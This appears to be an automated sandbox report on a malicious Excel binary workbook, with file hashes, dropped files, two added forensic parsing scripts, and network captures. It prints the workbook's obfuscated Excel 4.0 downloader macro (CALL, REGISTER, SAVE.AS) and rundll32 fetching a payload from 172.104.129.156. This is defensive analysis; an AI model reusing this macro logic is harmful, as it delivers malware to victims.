                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 20 21:02:52 2021, mtime=Wed Jan 20 21:02:52 2021, atime=Wed Jan 20 21:02:52 2021, length=104692, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1882
                                                                                                                                                                                                          Entropy (8bit):4.63489934711943
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8h3wVmzCASBvbEsWo7aB6myh3wVmzCASBvbEsWo7aB6m:8RwwVSNPoB6pRwwVSNPoB6
                                                                                                                                                                                                          MD5:BCEC82D990F66DC16794B980A15C00FE
                                                                                                                                                                                                          SHA1:376AD7ED7F08BE04DF9851BD6DC526180EFB4B74
                                                                                                                                                                                                          SHA-256:D02001F122F8DFE42D07E0EFEC5112D4D0DB432CF033EBE7220B8E0A43B5A461
                                                                                                                                                                                                          SHA-512:C123281ED772AF3664087EED53876872D84D7ED94F98CC1FAAD0237AF8A4688176B3EDC4FC9AD4591A2C34B29A21901DF71A8CAFD123BF8BEFC74CCF838D1B00
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: L..................F.... ....;..w.......w.......w................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....4R[...Public..f......L.4R[.....................<.........P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....\.2.....4R[. .94101.txt.D......4R[.4R[......g....................A...9.4.1.0.1...t.x.t.......H...............-.......G...........>.S......C:\Users\Public\94101.txt..".....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.9.4.1.0.1...t.x.t..........v..*.cM.jVD.Es.!...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............L..................F.... ....;..w.......w.......w..........
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\94101.xls.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jan 20 21:02:52 2021, mtime=Wed Jan 20 21:02:52 2021, atime=Wed Jan 20 21:02:52 2021, length=104692, window=hide
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):1882
                                                                                                                                                                                                          Entropy (8bit):4.623141859867614
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8hwRTmzAASbvbM+7aB6myhwRTmzAASbvbM+7aB6m:8hwATS3M3B6phwATS3M3B6
                                                                                                                                                                                                          MD5:0313B142356DAFE7672F359BBF9208C0
                                                                                                                                                                                                          SHA1:A25FE0B1E18C1C42ECF68C2D97154AB0E09E2E1E
                                                                                                                                                                                                          SHA-256:F5FD5B3DD39A0C6678FF653DF4498AB361B348BDD9CA327ED6C7267DB79D82E8
                                                                                                                                                                                                          SHA-512:B1BA6FFA6619A49CE95F184D716B85D41D1B994DCEF1B32F5699A8E58FB692C506ACCD0E975C6D3FC79772ED1ABC1CFBF6F9CA3C5D6618DFD9DFE24B5A1858E5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview: L..................F.... ....&..w...-...w...-...w................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....4R[...Public..f......L.4R[.....................<.....%..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....\.2.....4R[. .94101.xls.D......4R[.4R[......g.....................q..9.4.1.0.1...x.l.s.......H...............-.......G...........>.S......C:\Users\Public\94101.xls..".....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.9.4.1.0.1...x.l.s..........v..*.cM.jVD.Es.!...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............L..................F.... ....&..w...-...w...-...w..........
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Wed Jan 20 21:02:52 2021, atime=Wed Jan 20 21:02:52 2021, length=4096, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1638
                                                                                                                                                                                                          Entropy (8bit):4.615034736056573
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8oGY8As7RvbeY7aB6mymY8As7RvbeY7aB6m:8oGEspeNB6pmEspeNB6
                                                                                                                                                                                                          MD5:47102BACE3474FBE97079BC6D79823C1
                                                                                                                                                                                                          SHA1:3DBCE86153AE20A1649D3B9B0DFA2BF18BD4973E
                                                                                                                                                                                                          SHA-256:D70F591B72F3F7D0763CFD32BA187CEE3B7F2EE543FE70CF3EAF89DA73FCF0A3
                                                                                                                                                                                                          SHA-512:10494FED4541E1624CC245FA7A1C21AA91897472919828748D774B4A729C108CB21F431CD11470D7D9E330C0407562D378F0DBBEA71A8CAB62E47BCC9D808A3A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview: L..................F...........,........w....;..w...........................#....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1......Nlv..Public..f......L.4RN.....................<......o2.P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.......>...............-.......=...........>.S......C:\Users\Public........\.....\.....\.....\.....\.....\.P.u.b.l.i.c..........v..*.cM.jVD.Es.!...`.......X.......210979...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............L..................F...........,....h...w....;..w...........................#....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4RN.....................:.
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):265
                                                                                                                                                                                                          Entropy (8bit):4.3340256268217745
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:mrSmxWIMovKd2mxWIMovKd2tYrSmxWIMovKd2Z0d2mxWIMovKd2mMEyUZUmxWIMn:mrXolYrXByjU5jo
                                                                                                                                                                                                          MD5:94F404D8D23AEA4AFF120EEC82456785
                                                                                                                                                                                                          SHA1:3DA76C3DB78AD0C7CE88DB0BBA7844AC4EF73689
                                                                                                                                                                                                          SHA-256:F37B29A831D0F5B53C8AFC3F05BE0F0BFF66940B0A6CE07A402FCF23BA0EE05C
                                                                                                                                                                                                          SHA-512:713E45614E2126E2EFDD715125B73246AFA9457AF83BAABE1EB9BDEF614EA7CA387D3DC958BC22A7177C0620B64730BB07513071ADB79D13D4E1B476DBCAAF00
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview: Public.LNK=0..[misc??????]..94101.txt.LNK=0..[misc??????]..94101.txt.LNK=0..Public.LNK=0..[misc??????]..94101.txt.LNK=0..94101.txt.LNK=0..[misc??????]..94101.txt.LNK=0..[xls]..94101.xls.LNK=0..94101.xls.LNK=0..[misc??????]..94101.txt.LNK=0..[xls]..94101.xls.LNK=0..
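The three Recent\*.LNK entries above are forensic by-products of EXCEL.EXE itself opening C:\Users\Public\94101.txt, C:\Users\Public\94101.xls and the Public folder: both file shortcuts record the same length (104692) and the same ctime/mtime, and index.dat lists the .txt entry before the .xls entry. The shortcut previews already show the LocalBasePath ("C:\Users\Public\94101.xls") and the UTF-16 RelativePath ("..\..\..\..\..\..\Public\94101.xls"). The following script is an added example, not part of the report or its tooling: a minimal MS-SHLLINK parser that pulls target path, relative path, size and FILETIME stamps out of a .LNK, plus a builder that constructs a stand-in shortcut with the same target and size as the 94101.xls entry so the parser can be exercised offline. The constructed shortcut carries only a LinkInfo block and a RelativePath (no ItemIDList, no PropertyStore), which is an assumption for the test data, not a claim about the real files.

```python
import struct
from datetime import datetime, timedelta, timezone

# ShellLinkHeader constants (MS-SHLLINK). The CLSID is the "L....F" pattern
# visible at offset 0..19 of each Recent\*.LNK preview.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION))
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed values mirroring the 94101.xls shortcut in the report (assumed test data).
SAMPLE_TARGET = r"C:\Users\Public\94101.xls"
SAMPLE_RELATIVE = r"..\..\..\..\..\..\Public\94101.xls"
SAMPLE_SIZE = 104692
SAMPLE_MTIME = datetime(2021, 1, 20, 21, 2, 52, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime; 0 means unset."""
    return None if ft == 0 else FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000


def parse_lnk(data):
    """Extract target path, relative path, size and timestamps from a .LNK."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags, attrs, ctime, atime, wtime, size = struct.unpack_from("<IIQQQI", data, 20)
    info = {"file_attributes": attrs, "file_size": size,
            "created": filetime_to_datetime(ctime), "accessed": filetime_to_datetime(atime),
            "modified": filetime_to_datetime(wtime), "local_base_path": None}
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip the shell item ID list (u16 size + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        li = pos                                    # LinkInfo offsets are relative to its start
        li_size, _hdr, li_flags, _vol_off, lbp_off, _cnrl_off, suffix_off = struct.unpack_from("<7I", data, li)
        if li_flags & 0x1:                          # VolumeIDAndLocalBasePath present
            base = data[li + lbp_off:data.index(b"\x00", li + lbp_off)].decode("cp1252")
            suffix = data[li + suffix_off:data.index(b"\x00", li + suffix_off)].decode("cp1252")
            info["local_base_path"] = base + suffix
        pos = li + li_size
    unicode = bool(flags & IS_UNICODE)
    for field, flag in STRING_DATA_FIELDS:          # StringData: u16 char count, no terminator
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = 2 * count if unicode else count
        info[field] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return info


def build_lnk(local_path, relative_path, file_size, mtime):
    """Constructed minimal .LNK (header + LinkInfo + RelativePath) used as test input."""
    flags = HAS_LINK_INFO | HAS_RELATIVE_PATH | IS_UNICODE
    ft = datetime_to_filetime(mtime)
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIiIHHII", flags, 0x20, ft, ft, ft, file_size, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 0x11, 3, 0x1234ABCD, 0x10) + b"\x00"   # fixed drive, empty label
    base = local_path.encode("cp1252") + b"\x00"
    suffix = b"\x00"
    vol_off = 0x1C                                  # LinkInfoHeaderSize without unicode offsets
    lbp_off = vol_off + len(volume_id)
    suffix_off = lbp_off + len(base)
    li_size = suffix_off + len(suffix)
    link_info = (struct.pack("<7I", li_size, 0x1C, 0x1, vol_off, lbp_off, 0, suffix_off)
                 + volume_id + base + suffix)
    string_data = struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")
    return header + link_info + string_data


def sample_lnk():
    return build_lnk(SAMPLE_TARGET, SAMPLE_RELATIVE, SAMPLE_SIZE, SAMPLE_MTIME)


if __name__ == "__main__":
    for key, value in parse_lnk(sample_lnk()).items():
        print(f"{key:16} {value}")
```

Run against a real Recent\*.LNK the parser returns the same fields the "File Type" line summarises (length, ctime/mtime/atime) plus the resolved LocalBasePath, which is the value worth correlating with the certutil -decode command line and the Public folder drops listed elsewhere in the report.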
                                                                                                                                                                                                          C:\Users\user\Desktop\~$Presentation_812525.xlsb
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:Microsoft Excel 2007+
                                                                                                                                                                                                          Entropy (8bit):7.918106536317746
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                                                          • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                                                          • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                                                          File name:Presentation_812525.xlsb
                                                                                                                                                                                                          File size:141137
                                                                                                                                                                                                          MD5:4ddace9347c434a749eab40a211e6628
                                                                                                                                                                                                          SHA1:c46b2b46bd274ad37bb5dbcea12bc8278f3b361e
                                                                                                                                                                                                          SHA256:796d5317aae9d27707694f5e2832fe990d1a7890ac53ec339b8f1233fe05a3a7
                                                                                                                                                                                                          SHA512:baf696a31c34abead6f036d112abcf05cc50ce3aacf6a01dc2123d36bedfe19a6efbe695f1be6640bbbd96d40ce5d9a52c4abc00cd11e56618a5e0af6e6d7751
                                                                                                                                                                                                          SSDEEP:3072:KsUtFARPULAZemMA5uAgz3xQGarpjTTT5xI65LfsJM+LYtSP9Oo0Hj:iFAeErgzBQGWTTT5GYsJzlh0D
                                                                                                                                                                                                          File Content Preview:PK..........!....w............[Content_Types].xml ...(.........................................................................................................................................................................................................
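The "PK" magic in the content preview and the TrID split between "Binary workbook" and "ZIP compressed archive" say the same thing: an .xlsb is an OPC package, a ZIP whose worksheets and Excel 4.0 macro sheets are BIFF12 binary parts rather than XML. That is why the OLE indicators later in this report cannot see the macro, and why the "Hidden Macro 4.0" verdict needs two pieces of information: which parts carry the macrosheet content type, and which sheets the workbook marks hidden or veryHidden. The script below is an added example, not part of the report or its tooling. It reads [Content_Types].xml and the workbook relationships with the standard library, walks xl/workbook.bin as a BIFF12 record stream, and decodes BrtBundleSh (record type 0x9C, per MS-XLSB: hsState, iTabID, relationship id, sheet name). The workbook it builds for the test is a constructed stand-in with one visible worksheet and one veryHidden macro sheet; it is not the content of Presentation_812525.xlsb.

```python
import io
import posixpath
import struct
import xml.etree.ElementTree as ET
import zipfile

# Part content type of an Excel 4.0 macro sheet in a .xlsb (a .xlsm uses the
# same string with a "+xml" suffix).
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# BIFF12 record types from MS-XLSB: BrtBeginBook, BrtEndBook, BrtBundleSh.
BRT_BEGIN_BOOK, BRT_END_BOOK, BRT_BUNDLE_SH = 0x0083, 0x0084, 0x009C
HS_STATE = {0: "visible", 1: "hidden", 2: "veryHidden"}


def _read_varint(buf, pos, max_bytes):
    """BIFF12 integer: 7 bits per byte, high bit set means another byte follows."""
    value = 0
    for i in range(max_bytes):
        b = buf[pos + i]
        value |= (b & 0x7F) << (7 * i)
        if not b & 0x80:
            return value, pos + i + 1
    return value, pos + max_bytes


def iter_biff12_records(buf):
    """Yield (record_type, payload) for every record in a BIFF12 stream."""
    pos = 0
    while pos < len(buf):
        rtype, pos = _read_varint(buf, pos, 2)     # record type: 1 or 2 bytes
        size, pos = _read_varint(buf, pos, 4)      # payload size: 1 to 4 bytes
        yield rtype, buf[pos:pos + size]
        pos += size


def _read_wide_string(payload, pos):
    """XLWideString / XLNullableWideString: u32 char count, then UTF-16LE."""
    cch = struct.unpack_from("<I", payload, pos)[0]
    if cch == 0xFFFFFFFF:                          # nullable string marked absent
        return None, pos + 4
    end = pos + 4 + 2 * cch
    return payload[pos + 4:end].decode("utf-16-le"), end


def list_sheets(xlsb_bytes):
    """Every sheet in the workbook with its visibility and whether its part is a macrosheet."""
    with zipfile.ZipFile(io.BytesIO(xlsb_bytes)) as z:
        ct_root = ET.fromstring(z.read("[Content_Types].xml"))
        macro_parts = {o.get("PartName") for o in ct_root.iter(CT_NS + "Override")
                       if o.get("ContentType") == MACROSHEET_CT}
        rels_root = ET.fromstring(z.read("xl/_rels/workbook.bin.rels"))
        targets = {r.get("Id"): posixpath.normpath(posixpath.join("/xl/", r.get("Target")))
                   for r in rels_root.iter(REL_NS + "Relationship")}
        workbook = z.read("xl/workbook.bin")
    sheets = []
    for rtype, payload in iter_biff12_records(workbook):
        if rtype != BRT_BUNDLE_SH:
            continue
        hs_state, _tab_id = struct.unpack_from("<II", payload, 0)
        rel_id, pos = _read_wide_string(payload, 8)
        name, _ = _read_wide_string(payload, pos)
        part = targets.get(rel_id)
        sheets.append({"name": name, "part": part,
                       "state": HS_STATE.get(hs_state, f"unknown({hs_state})"),
                       "is_macrosheet": part in macro_parts})
    return sheets


def hidden_macrosheets(xlsb_bytes):
    """The 'Hidden Macro 4.0' condition: a macro sheet whose state is not visible."""
    return [s for s in list_sheets(xlsb_bytes) if s["is_macrosheet"] and s["state"] != "visible"]


# ---- constructed sample workbook (assumption: not the analysed file's content) ----
def _varint(n):
    out = bytearray()
    while True:
        b, n = n & 0x7F, n >> 7
        out.append(b | 0x80 if n else b)
        if not n:
            return bytes(out)


def _record(rtype, payload=b""):
    return _varint(rtype) + _varint(len(payload)) + payload


def _wide(s):
    return struct.pack("<I", len(s)) + s.encode("utf-16-le")


def build_sample_xlsb():
    workbook = (_record(BRT_BEGIN_BOOK)
                + _record(BRT_BUNDLE_SH, struct.pack("<II", 0, 1) + _wide("rId1") + _wide("Sheet1"))
                + _record(BRT_BUNDLE_SH, struct.pack("<II", 2, 2) + _wide("rId2") + _wide("Macro1"))
                + _record(BRT_END_BOOK))
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.bin" ContentType="application/vnd.ms-excel.sheet.binary.macroEnabled.main"/>'
        '<Override PartName="/xl/worksheets/sheet1.bin" ContentType="application/vnd.ms-excel.worksheet"/>'
        '<Override PartName="/xl/macrosheets/sheet1.bin" ContentType="application/vnd.ms-excel.macrosheet"/>'
        '</Types>')
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.bin"/>'
        '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.bin"/>'
        '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.bin", workbook)
        z.writestr("xl/_rels/workbook.bin.rels", rels)
        z.writestr("xl/worksheets/sheet1.bin", b"")   # cell data omitted; not needed here
        z.writestr("xl/macrosheets/sheet1.bin", b"")
    return buf.getvalue()


if __name__ == "__main__":
    for sheet in list_sheets(build_sample_xlsb()):
        print(sheet)
```

Pointed at a real sample, list_sheets() gives the sheet inventory a triage analyst wants before opening anything: the macro sheet name, its part path (the place to dump the BIFF12 formula records) and the veryHidden state that the Excel UI will not surface. A state of "unknown(n)" means the BrtBundleSh layout did not decode as expected and the file deserves a look with a full parser rather than a verdict.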

File Icon

Icon Hash: 74f0d0d2c6d6d0f4

Static OLE Info

General

Document Type: OpenXML
Number of OLE Files: 1

OLE File "Presentation_812525.xlsb"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

CALL(Sheet3!A16, Sheet3!A18, Sheet3!A20, 0, Sheet3!A22, Sheet3!D14, Sheet3!G16, 0, 0)
CALL(Sheet3!A16, Sheet3!A18, Sheet3!A20, 0, Sheet3!A22, Sheet3!D14, Sheet3!G17, 0, 0)

=IF(718,718)
They THAt BEliEvE in ThE EverLaSTinG GOD shAlt BE IMmuNe To tHE seWER SYsTem; tHEy SHAlT DISPel evIL And ViCe
=SAVE.AS(Sheet3!O14, 3)
For the lOrd HATh Not GiVen uS ThE spiRIT oF WICkEDNEss, bUT of AMaZIngnesS anD moRAlitY
=SAVE.AS(Sheet3!K14)
=CALL(Sheet3!A16,Sheet3!A18,Sheet3!A20,0,Sheet3!A22,Sheet3!D14,Sheet3!G16,0,0)
tHEy THaT hOnoR thE LORD tHy goD sHalt ResToRe ThEir BeNeVOleNce; thEY ShALt DrIVE AwAY dEPrAviTY
=WAIT(NOW() + "00:00:04")
=CALL(Sheet3!A16,Sheet3!A18,Sheet3!A20,0,Sheet3!A22,Sheet3!D14,Sheet3!G17,0,0)
THE lOrd HATh noT GiveN uS THe SpirIt oF kNaVERy, BUT OF DiSCERNMENt and COUrAgE
=WAIT(NOW() + "00:00:03")
=REGISTER(Sheet3!A16,Sheet3!A18,Sheet3!A20,"IONIC",,1,9)
thuS saItH THe HOlY one: OPEn YE nOt wAGonS FuLl of soup, BuT CANisTERs oF HaRdwarE
=IONIC(0,Sheet3!A22,Sheet3!D16,Sheet3!W14,0,0)
Wait uPon God And THoU shALt IncrEASe tHY TWitTer foLLowerS; THOU ShAlT BE sHelTERED FrOM The CaNCer
THE lOrd HATh noT GiveN uS THe SpirIt oF kNaVERy, BUT OF DiSCERNMENt and COUrAgE
=HALT()

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 20, 2021 14:03:03.215615988 CET | 192.168.2.3 | 8.8.8.8 | 0x5a9 | Standard query (0) | yahoo.com | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.901232958 CET | 192.168.2.3 | 8.8.8.8 | 0xe5d6 | Standard query (0) | www.yahoo.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 20, 2021 14:03:03.263524055 CET | 8.8.8.8 | 192.168.2.3 | 0x5a9 | No error (0) | yahoo.com |  | 74.6.143.26 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.263524055 CET | 8.8.8.8 | 192.168.2.3 | 0x5a9 | No error (0) | yahoo.com |  | 74.6.231.21 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.263524055 CET | 8.8.8.8 | 192.168.2.3 | 0x5a9 | No error (0) | yahoo.com |  | 74.6.143.25 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.263524055 CET | 8.8.8.8 | 192.168.2.3 | 0x5a9 | No error (0) | yahoo.com |  | 74.6.231.20 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.263524055 CET | 8.8.8.8 | 192.168.2.3 | 0x5a9 | No error (0) | yahoo.com |  | 98.137.11.163 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.263524055 CET | 8.8.8.8 | 192.168.2.3 | 0x5a9 | No error (0) | yahoo.com |  | 98.137.11.164 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.949115038 CET | 8.8.8.8 | 192.168.2.3 | 0xe5d6 | No error (0) | www.yahoo.com | new-fp-shed.wg1.b.yahoo.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 20, 2021 14:03:03.949115038 CET | 8.8.8.8 | 192.168.2.3 | 0xe5d6 | No error (0) | new-fp-shed.wg1.b.yahoo.com |  | 87.248.100.215 | A (IP address) | IN (0x0001)
Jan 20, 2021 14:03:03.949115038 CET | 8.8.8.8 | 192.168.2.3 | 0xe5d6 | No error (0) | new-fp-shed.wg1.b.yahoo.com |  | 87.248.100.216 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 172.104.129.156

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49707 | 172.104.129.156 | 80 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
Jan 20, 2021 14:03:02.946541071 CET | 883 | OUT | GET /campo/o/o HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 172.104.129.156
Connection: Keep-Alive
Jan 20, 2021 14:03:03.114121914 CET | 884 | IN | HTTP/1.1 307 Temporary Redirect
Date: Wed, 20 Jan 2021 13:03:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: ci_session=r2ce1jgfccpiedl3b3dpemllol14vptc; expires=Wed, 20-Jan-2021 15:03:02 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://yahoo.com
Content-Length: 599
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Data Ascii: <div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Notice</p><p>Message: Trying to get property 'hits' of non-object</p><p>Filename: controllers/Logger.php</p><p>Line Number: 120</p><p>Backtrace:</p><p style="margin-left:10px">File: /var/www/mmm/application/controllers/Logger.php<br />Line: 120<br />Function: _error_handler</p><p style="margin-left:10px">File: /var/www/mmm/index.php<br />Line: 315<br />Function: require_once</p></div>


HTTPS Packets

Timestamp:Jan 20, 2021 14:03:03.555258989 CET
Source IP:74.6.143.26
Source Port:443
Dest IP:192.168.2.3
Dest Port:49708
Subject (leaf):CN=*.www.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US
Issuer (leaf):CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before (leaf):Thu Oct 08 02:00:00 CEST 2020
Not After (leaf):Wed Mar 31 14:00:00 CEST 2021
Subject (intermediate):CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer (intermediate):CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before (intermediate):Tue Oct 22 14:00:00 CEST 2013
